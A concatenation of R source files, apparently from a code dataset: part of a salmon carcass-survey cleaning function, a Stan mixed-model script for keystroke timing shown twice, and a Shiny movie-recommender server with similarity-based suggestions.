River %in% c('Bear Creek', 'Lostine River', 'Hurricane Creek', 'Minam River', 'Prairie Creek', 'Parsnip Creek', 'Spring Creek') ~ 'Wallowa River'
),
LocationLabel = Section,
TransectName = SiteID,
SurveyDate = lubridate::ymd(gsub('T00:00:00', '', SurveyDate)),
SurveyYear = lubridate::year(SurveyDate),
ActivityDate = paste0(SurveyDate, 'T00:00:00'),
ActivityId = as.integer(SurveyID),
DatasetId = NA_integer_,
LocationId = NA_integer_,
TargetSpecies = 'S_CHN',
Pass = NA_integer_,
StartSurvey = NA_character_,
EndSurvey = NA_character_,
StartTime = Start_Time,
EndTime = End_Time,
Observers = Surveyors,
SurveyMethod = 'Ground',
GPSUnit = NA_character_, # No GPS for Carcasses.
Datum = NA_character_,
Weather = NA_character_,
Visibility = Visibility,
SurveyComments = paste0('Survey_Type: ', Survey_Type, '; ', Comments_SurveyEvent),
SampleNumber = GeneticsNumber,
HistoricSampleNumber = NA_character_,
CarcassSpecies = 'S_CHN',
Sex = case_when(
Sex == 'M' ~ 'Male',
Sex == 'F' ~ 'Female',
Sex == 'J' ~ 'Jack',
Sex %in% c('Unk', 'UNK') ~ 'Unknown'
),
ForkLength = ForkLength,
PercentSpawned = if_else(Sex == 'Male', NA_integer_, as.integer(round(PercentSpawned, 0))),
# SpawnedOut = case_when( # First Go - remove if other logic is best
# PreSpawn == 'Spawned' ~ 'Yes',
# PreSpawn == 'PreSpawn' ~ 'No',
# PreSpawn %in% c('', 'NotValid', 'Unknown') ~ 'Unknown',
# TRUE ~ NA_character_
# ),
SpawnedOut = case_when( # anti-PrespawnMort?
PercentSpawned < 50 ~ 'No', # Indicates a Prespawn Mortality
PercentSpawned >= 50 ~ 'Yes', # Successful Spawner
TRUE ~ NA_character_
),
OpercleLeft = if_else(grepl('LOP', OperclePunchType, ignore.case = T),
str_extract(OperclePunchType, '\\d?\\s*LOP'), NA_character_),
OpercleRight = if_else(grepl('ROP', OperclePunchType, ignore.case = T),
str_extract(OperclePunchType, '\\d?\\s*ROP'), NA_character_),
PITScanned = case_when(
PITscan == 'PIT tag present' ~ 'Yes',
PITscan == 'No PIT tag' ~ 'No',
PITscan == 'Not Scanned' ~ 'Unknown',
),
PITCode = PIT1, # no data in PIT2
AdiposeFinClipped = case_when( # Assuming all Hatchery fish are ad-clipped
grepl('ad', FinMark, ignore.case = T) ~ 'Yes',
grepl('unk', FinMark, ignore.case = T) | FinMark == '' ~ 'Unknown',
TRUE ~ 'No'
),
CWTScanned = if_else(`CWT(Y/N)` == 'Unk', 'Unknown', `CWT(Y/N)`),
SnoutCollected = case_when( # This may need to be revisited
grepl('\\d{2}[[:alpha:]]{1}\\d{4}', SnoutID) ~ 'Yes',
grepl('DB\\d{3}', SnoutID) ~ 'Yes',
TRUE ~ 'No'
),
Fins = NA_character_,
Scales = NA_character_,
Otolith = NA_character_,
Count = as.double(Count),
CarcassComments = Comments,
Latitude = NA_character_, # no lat/long for carcasses
Longitude = NA_character_,
RadioTag = if_else(RadioTag == 1, 'Yes', 'No'),
TransmitterType = NA_character_,
Vendor = NA_character_,
SerialNumber = NA_character_,
Frequency = NA_character_,
Channel = NA_character_,
Code = NA_character_,
TagsFloy = NA_character_,
TagsVIE = NA_character_,
TagsJaw = NA_character_,
TagsStaple = NA_character_, # didn't see anything in the database
TagsSpaghetti = NA_character_,
MarksVentralFin = NA_character_, # Extract LV/RV from FinMark ****************
Notes = NA_character_,
QAStatusId = NA_integer_,
CWTCode = CWTcode,
TagsPetersonDisk = NA_character_, # didn't see anything in the database
CarcassWPT = as.character(CarcassID),
DNACollected = NA_character_, # won't affect analysis
ActivityQAStatusId = NA_integer_,
ActivityQAComments = NA_character_,
FieldsheetLink = as.logical(NA),
QAStatusName = NA_character_,
EffDt = NA_character_,
Year = as.integer(Year),
AboveWeir = case_when(
is.na(AboveOrBelowWeir) | AboveOrBelowWeir == '' ~ NA_character_,
AboveOrBelowWeir %in% c('Above Weir', 'Diversion','Lostine Weir') ~ 'Yes',
AboveOrBelowWeir %in% c('Below Weir', 'BeforeWeir', 'No Weir', 'No weir', 'Now Weir') ~ 'No',
TRUE ~ 'Unknown'
),
AbovePITArray = 'Yes', # WR2 = Wallowa River Site, Wenaha=Yes, Minam=Yes. Imnaha=Yes.
AboveRST = case_when(
River %in% c('Wenaha River','Wallowa River') ~ 'No',
TribToName == 'Wallowa River' & !River %in% c('Minam River','Lostine River') ~ 'No',
River == 'Lostine River' & SiteID %in% c('LOS8','LOS8.1','LOS8.2','LOSW','LOSTULLEY') ~ 'No',
TRUE ~ 'Yes'
),
Origin = case_when(
Origin %in% c('Nat') ~ 'Natural',
# HON are non-clipped fish that weren't scanned in 2011. Assumed to be Naturals, but not positive b/c no CWT Scan.
Origin %in% c('DS.Hat','Hat') ~ 'Hatchery', # DS.Hat = hatchery determined by Discriminate Scale Analysis...
# ...where hatchery was determined by the distance between the origin and first annulus..
TRUE ~ 'Unknown' # HON = Unknown
),
Mark_Discernible = case_when(
OPPunch %in% c('Yes','No','yes','no', 'NO')
& MarkRecapSizeCategory %in% c('Adult','Jack','MiniJ') ~ TRUE,
TRUE ~ FALSE),
#OPPunch is the NEOR field for whether the passed upstream mark(s) are discernible on the carcass
#MarkRecapSizeCategory is the NEOR bread-crumb trail of whether to include/exclude carcasses in MR analyses
#we could use the MarkRecapSizeCategory criteria during cleaning or when stratifying data for input into cuyem functions
#using MarkRecapSizeCategory later would be more straightforward, otherwise we are hiding info that doesn't have anything to do
#with whether the mark is discernable, e.g., it was a radio-tagged carcass that was only found because of it's radio-tag
#similarly, above/below weir probably doesn't need to be incorporated into this variable
#but it all depends on how Kinzer wants to use the variable
Recapture = case_when(
Mark_Discernible == TRUE & OPPunch %in% c('Yes','yes') ~ TRUE,
TRUE ~ FALSE),
MR_strata = MarkRecapSizeCategory,
CWT_Age = ifelse(CWTAge>0,CWTAge, NA),
VIE_Age = NA_integer_,
PIT_Age = ifelse(PITage>0,PITage, NA),
Fin_Age = NA_integer_,
Scale_Age = ifelse(BestScaleAge>0,BestScaleAge, NA)
) %>%
# filter(MarkRecapSizeCategory %in% c('Adult','Adult NA')) %>% # This probably won't live here forever.
select(
ESU_DPS,
MPG,
POP_NAME,
TRT_POPID,
Species,
Run,
ReportingGroup,
StreamName,
TribToName,
LocationLabel,
TransectName,
SurveyYear,
SurveyDate,
ActivityDate,
ActivityId,
DatasetId,
LocationId,
TargetSpecies,
Pass,
StartSurvey,
EndSurvey,
StartTime,
EndTime,
Observers,
SurveyMethod,
GPSUnit,
Datum,
Weather,
Visibility,
SurveyComments,
SampleNumber,
HistoricSampleNumber,
CarcassSpecies,
Sex,
ForkLength,
SpawnedOut,
PercentSpawned,
OpercleLeft,
OpercleRight,
PITScanned,
PITCode,
AdiposeFinClipped,
CWTScanned,
SnoutCollected,
Fins,
Scales,
Otolith,
Count,
CarcassComments,
Latitude,
Longitude,
RadioTag = RadioTag,
TransmitterType,
Vendor,
SerialNumber,
Frequency,
Channel,
Code,
TagsFloy,
TagsVIE,
TagsJaw,
TagsStaple,
TagsSpaghetti,
MarksVentralFin,
Notes,
QAStatusId,
CWTCode,
TagsPetersonDisk,
CarcassWPT,
DNACollected,
ActivityQAStatusId,
ActivityQAComments,
FieldsheetLink,
QAStatusName,
EffDt,
Year,
AboveWeir,
AbovePITArray,
AboveRST,
Origin,
Mark_Discernible,
Recapture,
MR_strata,
CWT_Age,
VIE_Age,
PIT_Age,
Fin_Age,
Scale_Age)
return(data_clean)
}
|
# Load packages
library(tidyverse)
library(rstan)
library(plyr)
library(loo)
library(magrittr)
# Cache compiled Stan models and parallelize chains across available cores.
rstan_options(auto_write = TRUE)
options(mc.cores = parallel::detectCores())
# NOTE(review): relative setwd() assumes the script is launched from the
# project parent directory — fragile; consider here::here() or project paths.
setwd("CopyTask2019/")
# Sampling parameters
set.seed(125)
n_chain = 3
n_cores = 3
iterations = 10000  # total iterations per chain; half are discarded as warmup below
# Load df: keep positive inter-keystroke intervals (IKI) on target trials,
# then average IKI per subject x bigram x task component.
d <- read_csv("data/ct.csv") %>%
  filter(IKI > 0,
         target == 1
  ) %>%
  group_by( subj, bigram, component ) %>%
  dplyr::summarise(IKI = mean(IKI),
                   N = n()) %>%
  ungroup(); d
# Order components from the presumed easiest to hardest copy-task condition.
d$component <- d %$% factor(component, levels = c("Tapping", "Sentence", "HF", "LF", "Consonants"), ordered = TRUE)
# Data as list for stan input
# Map the component factor onto integer indices 1..K for Stan.
components <- d %$% as.numeric(mapvalues(component, from = levels(component), to= 1:length(unique(component))))
dat <- within( list(),
               {
                 N <- nrow(d)
                 y <- d$IKI # DV
                 components <- components
                 K <- max(components)    # number of task components
                 subj <- d$subj
                 S <- max(d$subj)        # number of subjects
                 bigram <- as.integer(factor(d$bigram))
                 B <- length(unique(d$bigram))  # number of distinct bigrams
               } );str(dat)
# Build the initial-value list for a single Stan chain.
#
# Fixed effects (beta) start at the mean log IKI and residual scales (sigma)
# at the SD of log IKI, replicated across the K components.  Random-effect
# standardized deviates (z_u), bigram effects (w), the Cholesky factor (L_u)
# and scale parameters get small/neutral starting values.  `alpha` is seeded
# with the chain id so chains are distinguishable.
#
# Reads the globals `dat` (Stan data list) and `d` (trial-level data frame).
start <- function(chain_id = 1) {
  log_iki <- log(dat$y)
  n_comp <- dat$K
  list(
    beta    = rep(mean(log_iki), n_comp),
    sigma   = rep(sd(log_iki), n_comp),
    z_u     = matrix(0.1, nrow = n_comp, ncol = dat$S),
    w       = rep(0.1, length(unique(d$bigram))),
    L_u     = matrix(0, nrow = n_comp, ncol = n_comp),
    sigma_u = rep(1, n_comp),
    sigma_w = 1,
    alpha   = chain_id
  )
}
# One initial-value list per chain, seeded with the chain id.
start_ll <- lapply(1:n_chain, function(id) start(chain_id = id) )
# --------------
# Stan model ##
# --------------
# Load model
lmm <- stan_model(file = "stanin/LMMcompvariance.stan")
# Check model
#m <- sampling(lmm, chain = 1, iter = 1, data = dat)
# Fit model.  include = FALSE drops the listed pars from the saved fit to
# keep the object small (they are nuisance/intermediate quantities).
m <- sampling(lmm,
              data = dat,
              init = start_ll,
              iter = iterations,
              warmup = iterations/2,
              chains = n_chain,
              cores = n_cores,
              refresh = 250,
              thin = 1,
              save_warmup = FALSE,
              include = FALSE,
              pars = c("mu", "L_u", "z_u", "sigma_comp"),
              seed = 81,
              control = list(max_treedepth = 16,
                             adapt_delta = 0.99)
)
#Save model
# NOTE(review): filename says "subjintercepts" but this script fits the
# component-variance model — confirm the intended output path.
saveRDS(m,
        file="stanout/LMMsubjintercepts.rda",
        compress="xz")
# Extract and save posterior and log likelihood separately
# Get log likelihood (for loo/WAIC model comparison)
log_lik <- extract_log_lik(m)
saveRDS(log_lik,
        file = "stanout/log_lik/LMMvar_loglik.rda",
        compress = "xz")
# Get parameter posterior
param <- c("beta", "sigma")
samps <- as.data.frame(m, pars = param)
saveRDS(samps,
        file = "stanout/posterior/LMMvar_posterior.rda",
        compress = "xz")
# Get random effects
param <- c("u", "w", "sigma_u", "sigma_w")
re <- as.data.frame(m, pars = param)
saveRDS(re,
        file = "stanout/RE/LMMvar_re.rda",
        compress = "xz")
# Get posterior predicted values
param <- c("y_tilde")
y_tilde <- as.data.frame(m, pars = param)
saveRDS(y_tilde,
        file = "stanout/y_tilde/LMMvar_y_tilde.rda",
        compress = "xz")
library(tidyverse)
library(rstan)
library(plyr)
library(loo)
library(magrittr)
rstan_options(auto_write = TRUE)
options(mc.cores = parallel::detectCores())
setwd("CopyTask2019/")
# Sampling parameters
set.seed(125)
n_chain = 3
n_cores = 3
iterations = 10000
# Load df
d <- read_csv("data/ct.csv") %>%
filter(IKI > 0,
target == 1
) %>%
group_by( subj, bigram, component ) %>%
dplyr::summarise(IKI = mean(IKI),
N = n()) %>%
ungroup(); d
d$component <- d %$% factor(component, levels = c("Tapping", "Sentence", "HF", "LF", "Consonants"), ordered = TRUE)
# Data as list for stan input
components <- d %$% as.numeric(mapvalues(component, from = levels(component), to= 1:length(unique(component))))
dat <- within( list(),
{
N <- nrow(d)
y <- d$IKI # DV
components <- components
K <- max(components)
subj <- d$subj
S <- max(d$subj)
bigram <- as.integer(factor(d$bigram))
B <- length(unique(d$bigram))
} );str(dat)
start <-
function(chain_id = 1){
list(beta = rep(mean(log(dat$y)), dat$K)
, sigma = rep(sd(log(dat$y)), dat$K)
, z_u = matrix(rep(0.1,dat$S*dat$K), nrow = dat$K),
w = rep(0.1, length(unique(d$bigram))),
L_u = matrix(rep(0, dat$K*dat$K), nrow = dat$K),
sigma_u = rep(1, dat$K),
sigma_w = 1,
alpha = chain_id
)
}
start_ll <- lapply(1:n_chain, function(id) start(chain_id = id) )
# --------------
# Stan model ##
# --------------
# Load model
lmm <- stan_model(file = "stanin/LMMcompvariance.stan")
# Check model
#m <- sampling(lmm, chain = 1, iter = 1, data = dat)
# Fit model
m <- sampling(lmm,
data = dat,
init = start_ll,
iter = iterations,
warmup = iterations/2,
chains = n_chain,
cores = n_cores,
refresh = 250,
thin = 1,
save_warmup = FALSE,
include = FALSE,
pars = c("mu", "L_u", "z_u", "sigma_comp"),
seed = 81,
control = list(max_treedepth = 16,
adapt_delta = 0.99)
)
#Save model
saveRDS(m,
file="stanout/LMMsubjintercepts.rda",
compress="xz")
# Extract and save posterior and log likelihood seperately
# Get log likelihood
log_lik <- extract_log_lik(m)
saveRDS(log_lik,
file = "stanout/log_lik/LMMvar_loglik.rda",
compress = "xz")
# Get parameter posterior
param <- c("beta", "sigma")
samps <- as.data.frame(m, pars = param)
saveRDS(samps,
file = "stanout/posterior/LMMvar_posterior.rda",
compress = "xz")
# Get random effects
param <- c("u", "w", "sigma_u", "sigma_w")
re <- as.data.frame(m, pars = param)
saveRDS(re,
file = "stanout/RE/LMMvar_re.rda",
compress = "xz")
# Get posterior predicted values
param <- c("y_tilde")
y_tilde <- as.data.frame(m, pars = param)
saveRDS(y_tilde,
file = "stanout/y_tilde/LMMvar_y_tilde.rda",
compress = "xz")
|
###Load library
library(shiny)
library(shinyjs)
library(tidyverse)
library(plyr)
library(data.table)
###Data and environment preparation
# Movie metadata table (id, names, poster URL, type*/director*/actor* columns,
# score, pop, rating distribution).
movie_all = read.table("./data/movie_all.rdata")
# The two movie-similarity matrices were written with a header row whose ids
# got an "X" prefix; read the header separately, re-attach the names, and
# strip the prefix so row/column names are bare movie ids.
header1 = read.table("./data/movie_cor.rdata", header = TRUE, nrow = 1)
movie_cor = fread("./data/movie_cor.rdata", skip=1, header=FALSE)[,-1]
setnames(movie_cor, colnames(header1))
colnames(movie_cor) = gsub("X(\\d+)","\\1",colnames(movie_cor))
rownames(movie_cor) = colnames(movie_cor)
header2 = read.table("./data/movie_cor2.rdata", header = TRUE, nrow = 1)
movie_cor2 = fread("./data/movie_cor2.rdata", skip=1, header=FALSE)[,-1]
setnames(movie_cor2, colnames(header2))
colnames(movie_cor2) = gsub("X(\\d+)","\\1",colnames(movie_cor2))
rownames(movie_cor2) = colnames(movie_cor2)
# User comment/rating records and precomputed clusters.
people_all = fread("./data/people_all.csv")
settle_cluster = read_rds("./data/settle_cluster.rdata")
movie_cluster = read.table("./data/movie_cluster.rdata")
# Initialize the user rating log with a dummy row (score = 1, id = 1); the
# dummy is dropped again when recommendations are computed.
# NOTE(review): this resets ./data/docu.rdata every time the app loads, so
# state is shared/overwritten across sessions — confirm single-user intent.
docu =data.frame(score=c(1), id = c(1)) ###Initialization the user-docu-vector!!!
write.table(docu,"./data/docu.rdata") ###Initialization the user-docu-vector!!!
# Recommend six unseen movies from the user's saved ratings.
#
# Reads the accumulated ratings from ./data/docu.rdata (the per-session score
# log written elsewhere in this app), drops the dummy initialization row, and
# scores every unrated movie by a similarity-weighted average of the user's
# ratings:
#   predicted(m) = sum_j cor(m, j) * score(j) / sum_j cor(m, j)
# over the rated movies j, with self-similarity removed.  The top 3 candidates
# from each of the two correlation matrices are returned.
#
# Depends on globals: movie_cor, movie_cor2 (square similarity matrices whose
# row/column names are movie ids).
# Returns: a numeric vector of 6 movie ids (3 per matrix).
create_movies = function(){
  # Fixed: was a hard-coded absolute path to the developer's machine; use the
  # same relative path as every other read/write of this file in the app.
  docu2 <- read.table("./data/docu.rdata")
  docu3 = docu2[-1, ]  # drop the dummy initialization row (score = 1, id = 1)
  scored_id = docu3$id
  movie_recon <- function(movie_cor){
    # nrow() is correct for both data.frame and data.table inputs;
    # length(movie_cor[, 1]) is not (a data.table subset would give 1).
    n = nrow(movie_cor)
    rated = colnames(movie_cor) %in% scored_id
    names_in = as.numeric(colnames(movie_cor)[rated])
    # Align the user's scores with the matrix's column order.
    score_frame = data.frame(id = names_in) %>% left_join(docu3, by = "id")
    score_vector = numeric(n)
    score_vector[which(rated)] = score_frame$score
    # Weighted rating sum / weight sum, excluding each movie's self-similarity.
    Movie_1 = (movie_cor - diag(rep(1, n))) %*% t(t(score_vector))
    Location = as.numeric(rated)
    Movie_2 = (movie_cor - diag(rep(1, n))) %*% t(t(Location))
    Movie = Movie_1/Movie_2
    # Only recommend movies the user has not rated yet.
    Movie_pool = Movie[!(rownames(Movie) %in% scored_id), ]
    recon_id = as.numeric(names(Movie_pool))[tail(order(Movie_pool), n = 3)]
    return(recon_id)
  }
  return(c(movie_recon(movie_cor), movie_recon(movie_cor2)))
}
function(input, output, session) {
observeEvent(input$refresh, {
input$save_inputs =0
docu2 <- read.table("./data/docu.rdata")
if (length(docu2) <=10 ){
id = sample(c(settle_cluster[[1]],settle_cluster[[2]],settle_cluster[[3]]),1)
}else if((length(docu2)-10)%%6 == 1){
id_list = create_movies()
id = sample(id_list,1)
id_list = id_list[id_list!=id]
}else{
id = sample(id_list,1)
id_list = id_list[id_list!=id]
}
poster = movie_all[movie_all$id==id, 'poster']
output$movie_info_main <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
observeEvent(input$save_inputs, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_score))
print(user_rate)
docu2 = rbind(docu2, data.frame(score=user_rate, id = id))
write.table(docu2, "./data/docu.rdata")
})
user_rate <- eventReactive(input$save_inputs, as.numeric(gsub('(\\d).+?','\\1',input$user_score)))
output$real_rate <- renderUI(
if(user_rate()<=2){
tags$h3(user_rate())
}
)
###Comment_block
observeEvent(input$side, {
comment = people_all[people_all$movie_id == id,]
comment = comment[!is.na(comment$movie_score),]
comment$movie_comment = as.character(comment$movie_comment)
comment = comment[comment$movie_comment!="",]
output$movie_inspect5<-renderTable({
comment[comment$movie_score==5,c('movie_comment','movie_time','user_id')]
})
output$movie_inspect4<-renderTable({
comment[comment$movie_score==4,c('movie_comment','movie_time','user_id')]
})
output$movie_inspect3<-renderTable({
comment[comment$movie_score==3,c('movie_comment','movie_time','user_id')]
})
output$movie_inspect2<-renderTable({
comment[comment$movie_score==2,c('movie_comment','movie_time','user_id')]
})
output$movie_inspect1<-renderTable({
comment[comment$movie_score==1,c('movie_comment','movie_time','user_id')]
})
})
###Dist_block
observeEvent(input$side, {
x = 1:5
y = select(movie_all[movie_all$id==id,],starts_with('rating'))
y = sapply(y, function(x) as.numeric(sub("%", "", x))/100)
y = rev(y)
a = data.frame(x = x, y = y)
output$user_dist <- renderPlot({
ggplot(a, mapping = aes(x = x, y = y)) + geom_smooth(col='royalblue')+
theme_hc() + geom_point(x=user_rate(),y=0, col='tomato',
alpha = 0.25, cex=5)
})
})
###Movie_might_block
observeEvent(input$side, {
###BY_movie_block
poster_list=c()
cor_list = movie_cor[id==rownames(movie_cor),]
movie_might = names(cor_list)[tail(order(cor_list))][1:5]
output$movie_might1 <- renderUI({
tags$img(src = movie_all[movie_all$id==movie_might[1],'poster'])
})
observeEvent(input$movie_select1,{
id = movie_might[1]
output$movie_might_info1 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_movie_might1, {
#docu3 <- read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score1))
print(user_rate)
docu2 <<- rbind(docu2, data.frame(score=user_rate, id = movie_might[1]))
write.table(docu2, "./data/docu.rdata")
})
user_rate <- eventReactive(input$save_movie_might1, as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score1)))
# "Might like" slots 2-5. Each slot i wires up:
#   output$movie_might<i>      - poster thumbnail
#   input$movie_select<i>      - click reveals output$movie_might_info<i>
#   input$save_movie_might<i>  - persists the rating from movie_might_score<i>
# The four hand-copied, index-only-different blocks are generated in one
# loop; each lapply iteration closes over its own `slot`.
lapply(2:5, function(slot) {
  output[[paste0("movie_might", slot)]] <- renderUI({
    tags$img(src = movie_all[movie_all$id == movie_might[slot], 'poster'])
  })
  observeEvent(input[[paste0("movie_select", slot)]], {
    id <- movie_might[slot]
    output[[paste0("movie_might_info", slot)]] <- renderUI({
      # Collapse the NA-padded type/director/actor columns to "a/b/c".
      type <- movie_all[movie_all$id == id, grep('type\\d', names(movie_all))]
      type <- paste(type[!is.na(type)], collapse = "/")
      rate <- paste(movie_all[movie_all$id == id, 'score'],
                    " (", movie_all[movie_all$id == id, 'pop'], "人评价)",
                    sep = "")
      director <- movie_all[movie_all$id == id, grep('director\\d', names(movie_all))]
      director <- paste("导演:", paste(director[!is.na(director)], collapse = "/"))
      actor <- movie_all[movie_all$id == id, grep('actor\\d', names(movie_all))]
      actor <- paste("演员", paste(actor[!is.na(actor)], collapse = "/"))
      tags$div(
        h3(movie_all[movie_all$id == id, 'English_name']),
        h4(movie_all[movie_all$id == id, 'name']),
        h4(rate),
        h5(type),
        h6(director),
        h6(actor)
      )
    })
  })
  observeEvent(input[[paste0("save_movie_might", slot)]], {
    user_rate <- as.numeric(gsub('(\\d).+?', '\\1',
                                 input[[paste0("movie_might_score", slot)]]))
    print(user_rate)
    # Fix: slots 3-5 originally rbind-ed onto a *local* copy of docu2, so
    # the in-memory log that the analysis tab reads never saw those
    # ratings. Use <<- (as slot 2 already did) before persisting to disk.
    docu2 <<- rbind(docu2, data.frame(score = user_rate, id = movie_might[slot]))
    write.table(docu2, "./data/docu.rdata")
  })
})
})
###User_might_block
# "Viewers of this movie also liked": when the sidebar opens, show the
# five titles whose co-viewer correlation (movie_cor2) with the movie
# currently on display (`id`, inherited from the enclosing refresh
# handler) is highest.
observeEvent(input$side, {
  cor_list2 <- movie_cor2[id == rownames(movie_cor2), ]
  user_might <- names(cor_list2)[tail(order(cor_list2))][1:5]
  # One poster / detail panel / save-rating handler per slot. The five
  # hand-copied blocks differed only in their index, and the slot-2 save
  # handler was registered TWICE (appending every slot-2 rating to the
  # log twice); the loop registers each handler exactly once.
  lapply(1:5, function(slot) {
    output[[paste0("user_might", slot)]] <- renderUI({
      tags$img(src = movie_all[movie_all$id == user_might[slot], 'poster'])
    })
    observeEvent(input[[paste0("user_select", slot)]], {
      id <- user_might[slot]
      output[[paste0("user_might_info", slot)]] <- renderUI({
        # Collapse the NA-padded type/director/actor columns to "a/b/c".
        type <- movie_all[movie_all$id == id, grep('type\\d', names(movie_all))]
        type <- paste(type[!is.na(type)], collapse = "/")
        rate <- paste(movie_all[movie_all$id == id, 'score'],
                      " (", movie_all[movie_all$id == id, 'pop'], "人评价)",
                      sep = "")
        director <- movie_all[movie_all$id == id, grep('director\\d', names(movie_all))]
        director <- paste("导演:", paste(director[!is.na(director)], collapse = "/"))
        actor <- movie_all[movie_all$id == id, grep('actor\\d', names(movie_all))]
        actor <- paste("演员", paste(actor[!is.na(actor)], collapse = "/"))
        tags$div(
          h3(movie_all[movie_all$id == id, 'English_name']),
          h4(movie_all[movie_all$id == id, 'name']),
          h4(rate),
          h5(type),
          h6(director),
          h6(actor)
        )
      })
    })
    observeEvent(input[[paste0("save_user_might", slot)]], {
      # Re-read the on-disk log before appending so ratings saved by
      # other handlers are not lost (slot 1 originally appended to a
      # stale in-memory copy; slots 2-5 already re-read the file).
      docu2 <- read.table("./data/docu.rdata")
      user_rate <- as.numeric(gsub('(\\d).+?', '\\1',
                                   input[[paste0("user_might_score", slot)]]))
      print(user_rate)
      docu2 <- rbind(docu2, data.frame(score = user_rate, id = user_might[slot]))
      write.table(docu2, "./data/docu.rdata")
    })
  })
})
###sever_user_analyse_block
# When the sidebar opens, summarize the user's saved ratings: a
# histogram of the scores and a table of the mean rating per genre.
observeEvent(input$side, {
  docu3 = docu2[-1,]  # drop the dummy initialization row (score 1, id 1)
  test2 = plyr::join(docu3, movie_all, by = "id")  # attach movie metadata
  output$hist <- renderPlot({
    hist(test2$score)
  })
  # Rename the user's score so it cannot clash with movie_all's own
  # `score` column in the selections below.
  names(test2)[1] = "docu_score"
  test3 = select(test2, docu_score, starts_with("type"))
  # Long format: one row per (rating, genre) pair; then drop the NA
  # padding genres and keep only (docu_score, type).
  test3 = gather(test3, "type1":"type5",key = "index", value = "type")
  test3 = test3[!is.na(test3$type),c(1,3)]
  output$table<-renderTable({
    as.data.frame(t(tapply(test3$docu_score, test3$type, mean, na.rm = T)))})
  # NOTE(review): the result of this table() call is discarded — dead
  # code or a leftover debug statement; confirm and remove.
  table(test3$type)
})
})
# Genre-cluster cards 1-13. Clicking "refresh" on card k samples a
# random movie from pre-computed cluster k (settle_cluster[[k]]) and
# renders its poster + details into output$cluster<k>_info. The 13
# observers were hand-copied and identical except for the index, so
# they are generated in one loop; each iteration closes over its own k.
# (Each original handler also re-read ./data/docu.rdata without ever
# using the result — that dead file read is dropped.)
lapply(1:13, function(k) {
  observeEvent(input[[paste0("refresh", k)]], {
    id <- sample(settle_cluster[[k]], 1)
    poster <- movie_all[movie_all$id == id, 'poster']
    output[[paste0("cluster", k, "_info")]] <- renderUI({
      # Collapse the NA-padded type/director/actor columns to "a/b/c".
      type <- movie_all[movie_all$id == id, grep('type\\d', names(movie_all))]
      type <- paste(type[!is.na(type)], collapse = "/")
      rate <- paste(movie_all[movie_all$id == id, 'score'],
                    " (", movie_all[movie_all$id == id, 'pop'], "人评价)",
                    sep = "")
      director <- movie_all[movie_all$id == id, grep('director\\d', names(movie_all))]
      director <- paste("导演:", paste(director[!is.na(director)], collapse = "/"))
      actor <- movie_all[movie_all$id == id, grep('actor\\d', names(movie_all))]
      actor <- paste("演员", paste(actor[!is.na(actor)], collapse = "/"))
      tags$div(
        img(src = poster),
        h3(movie_all[movie_all$id == id, 'English_name']),
        h4(movie_all[movie_all$id == id, 'name']),
        h4(rate),
        h5(type),
        h6(director),
        h6(actor)
      )
    })
  })
})
# "Refresh cluster" card: pick one of the 50 pre-computed similarity
# clusters (columns of movie_cluster) at random and show its members;
# rev() so the best-ranked titles come first. Each of the six display
# slots exposes a poster (output$cluster_might<i>), a click target
# (input$cluster_select<i>) and a detail panel
# (output$cluster_might_info<i>). The six hand-copied, index-only
# different wirings are generated in one loop.
observeEvent(input$refresh_cluster, {
  id_list <- rev(movie_cluster[, sample(1:50, 1)])
  lapply(1:6, function(slot) {
    output[[paste0("cluster_might", slot)]] <- renderUI({
      tags$img(src = movie_all[movie_all$id == id_list[slot], 'poster'])
    })
    observeEvent(input[[paste0("cluster_select", slot)]], {
      id <- id_list[slot]
      output[[paste0("cluster_might_info", slot)]] <- renderUI({
        # Collapse the NA-padded type/director/actor columns to "a/b/c".
        type <- movie_all[movie_all$id == id, grep('type\\d', names(movie_all))]
        type <- paste(type[!is.na(type)], collapse = "/")
        rate <- paste(movie_all[movie_all$id == id, 'score'],
                      " (", movie_all[movie_all$id == id, 'pop'], "人评价)",
                      sep = "")
        director <- movie_all[movie_all$id == id, grep('director\\d', names(movie_all))]
        director <- paste("导演:", paste(director[!is.na(director)], collapse = "/"))
        actor <- movie_all[movie_all$id == id, grep('actor\\d', names(movie_all))]
        actor <- paste("演员", paste(actor[!is.na(actor)], collapse = "/"))
        tags$div(
          h3(movie_all[movie_all$id == id, 'English_name']),
          h4(movie_all[movie_all$id == id, 'name']),
          h4(rate),
          h5(type),
          h6(director),
          h6(actor)
        )
      })
    })
  })
})
}
| /shiny_2/server.R | no_license | BiiHug/bouban_public | R | false | false | 46,122 | r | ###Load library
# ---- Packages ----
library(shiny)
library(shinyjs)
library(tidyverse)
# NOTE(review): plyr is attached *after* tidyverse, so plyr masks dplyr
# verbs (summarise, mutate, ...). This file calls plyr::join()
# explicitly, but keep the load order in mind when editing.
library(plyr)
library(data.table)
###Data and environment preparation
# Movie metadata: one row per movie with names, score, pop, poster URL
